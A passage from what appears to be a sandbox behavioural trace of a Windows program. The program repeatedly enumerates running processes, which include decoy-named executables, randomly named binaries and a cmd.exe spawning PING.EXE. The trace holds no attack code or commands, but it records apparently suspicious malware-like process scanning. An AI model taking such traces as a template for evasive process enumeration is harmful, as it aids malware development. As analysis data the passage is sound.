th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0103.933] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0103.934] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, 
dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0103.935] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0103.936] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0103.937] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0103.938] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0103.939] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0103.987] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0103.988] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0103.989] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0103.990] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0103.991] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0103.992] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0103.993] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0103.994] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0103.995] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, 
th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0103.996] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0103.997] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0103.998] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0103.999] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0104.000] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.001] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0104.002] CloseHandle (hObject=0xc4) returned 1 [0104.002] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc 
[0104.006] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0104.007] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0104.008] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0104.008] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0104.009] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0104.010] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0104.010] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0104.011] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0104.012] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0104.012] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0104.013] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.014] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.014] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.015] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.016] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.016] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0104.017] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.018] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.018] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0104.019] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.061] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0104.062] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0104.064] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0104.065] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0104.066] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.067] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0104.068] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0104.069] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) 
returned 1 [0104.070] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0104.071] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0104.073] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0104.074] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0104.075] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0104.076] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0104.077] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="marble.exe")) returned 1 [0104.078] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0104.079] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0104.080] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0104.081] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0104.082] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0104.083] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0104.085] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, 
pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0104.086] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0104.087] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0104.088] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0104.089] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0104.090] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.091] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0104.091] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0xbbc, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0104.093] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0104.093] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0104.094] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xbe8, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0104.095] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0104.096] CloseHandle (hObject=0xbc) returned 1 [0104.096] Sleep (dwMilliseconds=0x12c) [0104.483] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0104.489] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0104.490] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0104.491] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0104.492] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0104.493] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0104.494] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, 